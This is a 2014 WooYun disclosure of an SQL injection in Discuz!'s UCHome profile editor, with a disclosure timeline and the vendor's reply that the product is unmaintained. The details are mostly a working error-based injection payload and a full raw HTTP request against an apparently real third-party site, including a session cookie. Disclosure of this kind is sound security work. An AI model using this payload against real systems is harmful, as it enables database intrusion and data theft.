当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069193

漏洞标题:UCHOME SQL注入漏洞

相关厂商:Discuz!

漏洞作者: 滨湖虎子

提交时间:2014-07-21 17:50

修复时间:2014-10-19 17:52

公开时间:2014-10-19 17:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-21: 细节已通知厂商并且等待厂商处理中
2014-07-22: 厂商已经确认,细节仅向厂商公开
2014-07-25: 细节向第三方安全合作伙伴开放
2014-09-15: 细节向核心白帽子及相关领域专家公开
2014-09-25: 细节向普通白帽子公开
2014-10-05: 细节向实习白帽子公开
2014-10-19: 细节向公众公开

简要描述:

老牌知名程序,今天研究了一下,发现此漏洞
(需要登录)

详细说明:

注册用户后,修改个人资料。抓包
然后修改如下数据

info[0',0,(select (1) from mysql.user where 1%3d1 and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (version())),1,62)))a from information_schema.tables group by a)b)))#]=aaa


=====================
完整HTTP:

POST http://www.aspmpsx.com/cp.php?ac=profile&op=info&ref HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.aspmpsx.com/cp.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 538
Host: www.aspmpsx.com
Pragma: no-cache
Cookie: uchome_auth=7ef14AJ93VMaXgN%2FG8bk93sG%2FMXWJobCrIUN8W88w7hXFUT0lMkQ8EHzs%2FBOTghCbon2OxclXHfvNtMtYF9l; ECS[visit_times]=1; _nitcFirstTime=2014-7-1%2020%3A38%3A2; _nitcReturnTime=2014-7-1%2020%3A38%3A2; prds0[62]=62; n_prds0=13; n_prd0[62]=13; n_prd20[62]=f37516e49abff12a57c8c6f328acd355; bdshare_firstime=1404980017332; uchome_loginuser=admin; uchome__refer=%252Fadmincp.php; uchome_space_top_show=1; uchome_checkpm=1; uchome_sendmail=1
name=add%27&marry=1&friend%5Bmarry%5D=0&birthyear=1989&birthmonth=2&birthday=1&friend%5Bbirth%5D=0&blood=A&friend%5Bblood%5D=0&birthprovince=%C7%E0%BA%A3&birthcity=%B5%C2%C1%EE%B9%FE&friend%5Bbirthcity%5D=0&resideprovince=%C7%E0%BA%A3&residecity=%B5%C2%C1%EE%B9%FE&friend%5Bresidecity%5D=0&profilesubmit=%B1%A3%B4%E6&formhash=8fc39a43&info[0',0,(select (1) from mysql.user where 1%3d1 and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (version())),1,62)))a from information_schema.tables group by a)b)))#]=aaa

漏洞证明:

QQ截图20140721145949.jpg

修复方案:

你们比我懂

版权声明:转载请注明来源 滨湖虎子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-22 09:57

厂商回复:

uchome 程序已经停止维护,不过还是要感谢您对我们产品的关注,合作愉快。

最新状态:

暂无